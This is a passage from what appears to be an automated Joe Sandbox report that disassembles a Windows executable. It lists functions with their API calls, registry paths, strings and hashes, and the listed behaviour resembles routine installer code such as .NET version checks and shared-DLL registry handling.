                                                              • DeleteDC.GDI32(?), ref: 0041B4D9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                              • String ID:
                                                              • API String ID: 644427674-0
                                                              • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                              • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                              • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                              • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                              Function 00472B48 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 337COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                              • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                              • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                              • API String ID: 971782779-3668018701
                                                              • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                              • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                              • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                              • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                              Function 00454874 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                              • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                              • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                              • RegOpenKeyEx, xrefs: 00454910
                                                              • , xrefs: 004548FE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$FormatMessageOpen
                                                              • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                              • API String ID: 2812809588-1577016196
                                                              • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                              • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                              • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                              • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                              Function 00459458 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                              Strings
                                                              • .NET Framework not found, xrefs: 0045961D
                                                              • .NET Framework version %s not found, xrefs: 00459609
                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                              • v4.0.30319, xrefs: 004594F1
                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                              • v2.0.50727, xrefs: 0045955B
                                                              • v1.1.4322, xrefs: 004595C2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Close$Open
                                                              • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                              • API String ID: 2976201327-446240816
                                                              • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                              • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                              • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                              • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                              Function 00458A44 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                              • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                              • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                              • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                              • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                              • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                              Strings
                                                              • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                              • Helper process exited., xrefs: 00458AC5
                                                              • Helper isn't responding; killing it., xrefs: 00458A87
                                                              • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                              • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                              • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                              • API String ID: 3355656108-1243109208
                                                              • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                              • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                              • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                              • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                              Function 00454528 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                              • RegCreateKeyEx, xrefs: 004545C3
                                                              • , xrefs: 004545B1
                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateFormatMessageQueryValue
                                                              • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                              • API String ID: 2481121983-1280779767
                                                              • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                              • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                              • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                              • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                              Function 00496C50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                              • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                              • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                              • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                              • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                              • API String ID: 1549857992-2312673372
                                                              • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                              • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                              • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                              • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                              Function 0042E418 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseHandleModuleProc
                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                              • API String ID: 4190037839-2312295185
                                                              • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                              • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                              • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                              • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                              Function 004629F0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetActiveWindow.USER32 ref: 004629FC
                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                              • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                              • API String ID: 2610873146-3407710046
                                                              • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                              • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                              • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                              • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                              Function 0042F188 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetActiveWindow.USER32 ref: 0042F194
                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                              • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                              • API String ID: 2610873146-3407710046
                                                              • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                              • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                              • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                              • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                              Function 00458C1C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,021E3858,00000000), ref: 00458C79
                                                              • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                              • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                              • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                              • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                              • String ID: CreateEvent$TransactNamedPipe
                                                              • API String ID: 2182916169-3012584893
                                                              • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                              • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                              • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                              • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                              Function 00456D20 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                              • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                              • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorHandleLastLoadModuleProcType
                                                              • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                              • API String ID: 1914119943-2711329623
                                                              • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                              • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                              • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
